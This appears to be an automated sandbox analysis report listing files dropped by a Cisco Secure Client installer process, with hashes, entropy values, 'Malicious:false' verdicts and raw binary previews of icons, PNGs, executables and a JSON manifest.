                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1006184
                                                                                                                                                                                                  Entropy (8bit):5.97738342017222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:9/9IZHQOBWLxPXdwWeKHI0+DPwYZC3Yeba96ga8nXNBZK/8id:9V2HQO6PqtPwJ3Yijg/dB0Ei
                                                                                                                                                                                                  MD5:744D2DC7CA442E065AC4F23C6A7B9E5F
                                                                                                                                                                                                  SHA1:0039BE9938086F925F321EC8B2FD4D008F600C1A
                                                                                                                                                                                                  SHA-256:4E9E9F15FFBFC9729F4BC561D8670214A86822D682F49A2B286BB798FD59B549
                                                                                                                                                                                                  SHA-512:918009B74EAF5CD932E7BFE1CBD65425917D8CFCDB32B6A10FF2DD44A894E06DA77544522B72F77880D1ADD9961DB0A3401CC20242976E241499F65899E76826
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.j....X...X...X...Y...X...Y...X...Y...XI..Y...XI..Y...XI..YK..X...Y...X...X...X...Y...X...X...X...X...X...Y...XRich...X........................PE..L.....d.....................F......P.............@..........................`......>.....@.................................@........P..P...............hH.......Q...w..T...................@y......Hx..@............................................text............................... ..`.rdata...!......."..................@..@.data....)... ......................@....rsrc...P....P......................@..@.reloc...Q.......R..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):451
                                                                                                                                                                                                  Entropy (8bit):3.838636988372643
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:3FFU5eWNwSrzakk5CGvFF6cqEPtvFFEHxiulEk9bkNy4SQUa:1e5eU/aHHAcqE/uxiTKTM
                                                                                                                                                                                                  MD5:F31B286BC9DAC414CAE57B36020FDB4A
                                                                                                                                                                                                  SHA1:BD9D861EA0BC7DBDB9A1C9949ADFB7BDF3345C6B
                                                                                                                                                                                                  SHA-256:7778B7BB7E7F9D25D71747BAA3BEB76E39C0336EB9DA0D823D7C6297540E7975
                                                                                                                                                                                                  SHA-512:937B660BDD91A8467DB83F9B5B25046D0443EB2648671CE420F9A032123A479B249B9001D860BDA4FE3488065F0FF02AD01BA758CB11EE07710C7651FA072945
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "downloader" : {.. "display-name" : "Cisco Secure Client - Downloader",.. "type" : "exe",.. "uri" : "binaries/vpndownloader.exe",.. "hash" : "7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3",.. "hash-type" : "sha256",.. "version" : "5.0.05040".. }..}..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):745576
                                                                                                                                                                                                  Entropy (8bit):6.225379685413281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:Qx5TysIG9cavT2FWgBKkuD/wQoJ4GMJzu:cxIGKavT2FWz/wQffzu
                                                                                                                                                                                                  MD5:DB9F087F33F5375F0883F4E29F81074C
                                                                                                                                                                                                  SHA1:1D9715CDFA425F4F6FA14D80233B9ECE8F9AA89E
                                                                                                                                                                                                  SHA-256:5D27CE634581F9CEE12C17D9F4AD6AB1B7C6BCDBB911618E7416D2FB4F1981F0
                                                                                                                                                                                                  SHA-512:A740845C79909898881742BA552F8358EE35EA33077A41EA2F9BC4FA824923956AFB1AB3D7870FEE626110BB51FC347AC3D04A2D84747D99EA98B1F3E9FB98C0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.h3.m.`.m.`.m.`...a.m.`...a.m.`...a.m.`J..a.m.`J..a.m.`J..aJm.`...a.m.`.m.`.m.`...a.m.`...`.m.`.m.`.m.`...a.m.`Rich.m.`........................PE..d......d.........."......V.......... ..........@..........................................`.....................................................x....0..P........8......hH...@...5......T.......................(......8............p...............................text....T.......V.................. ..`.rdata...%...p...&...Z..............@..@.data....2..........................@....pdata...8.......:..................@..@_RDATA....... ......................@..@.rsrc...P....0......................@..@.reloc...5...@...6..................@..B........................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):119912
                                                                                                                                                                                                  Entropy (8bit):6.60185962501979
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:pykiJ1Z1K95jvS8BBw/qZqocqQThEt9WSt6MlNNp:MkiHTMBBaNEtUS9lNz
                                                                                                                                                                                                  MD5:E418E6429D29325A842E8A5F01B57236
                                                                                                                                                                                                  SHA1:D075045BC923F0AD63907CDF47AF6FE7B40DB49C
                                                                                                                                                                                                  SHA-256:EAD03108A441D27DC347649DDA3F5BBD2144B5EC35B775944761F7BBFFC95CB2
                                                                                                                                                                                                  SHA-512:92969A8394DF09973DE2F5E8A528A41EC046B5C0CCA3292CD734DF900AF1EB85A3C8643273051D1E2B27B82EC992D61559A9BB06A4B49064FECCB64EB35D2876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....'b.........."!................@>....................................................@A........................M_......?`..(.......................hH..........D\.......................Y......`................a..<....]..`....................text............................... ..`.rdata...n.......p..................@..@.data........p.......d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
